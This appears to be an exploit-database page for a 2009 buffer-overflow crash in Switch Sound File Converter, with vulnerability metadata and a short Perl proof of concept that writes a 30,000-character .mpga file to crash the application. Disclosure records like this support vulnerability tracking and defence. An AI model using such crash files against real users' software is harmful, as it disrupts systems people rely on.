header-logo
Suggest Exploit
vendor:
Switch Sound File Converter
by:
Jacky
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Switch Sound File Converter
Affected Version From: 0.0.0.0
Affected Version To: 0.0.0.0
Patch Exists: N/A
Related CWE: N/A
CPE: a:nch_software:switch_sound_file_converter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2009

Switch Sound File Converter .mpga BOF DOS

When a file containing 30k of A's with .mpga extension is loaded and played from Switch Sound File converter, it causes a buffer overflow and crashes the application.

Mitigation:

Ensure that all input is validated and sanitized before being used in the application.
Source

Exploit-DB raw data:

# Exploit Title: Switch Sound File Converter .mpga BOF DOS
# Date: 2009-1-1
# Author: Jacky
# Version: 0.0.0.0
# Tested on: Windows XP SP2
#Switch Sound File Converter .mpga BOF POS Vulnerability
#Discovered and written by : ( Jacky )
#Greetz to Corelan team and Peter Van Eeckhoutte !!!
#When you create a file that contains 30k of A's with .mpga extension , and load it then play it from Switch Sound File converter , it crashs !!!
my $file="Crash.mpga";
my $junk="A"x30000;
open(INI,">$file");
print INI $junk;
print "[+]File Created Successfully!\n";
print "[+]By Jacky!!!\n";
close(INI);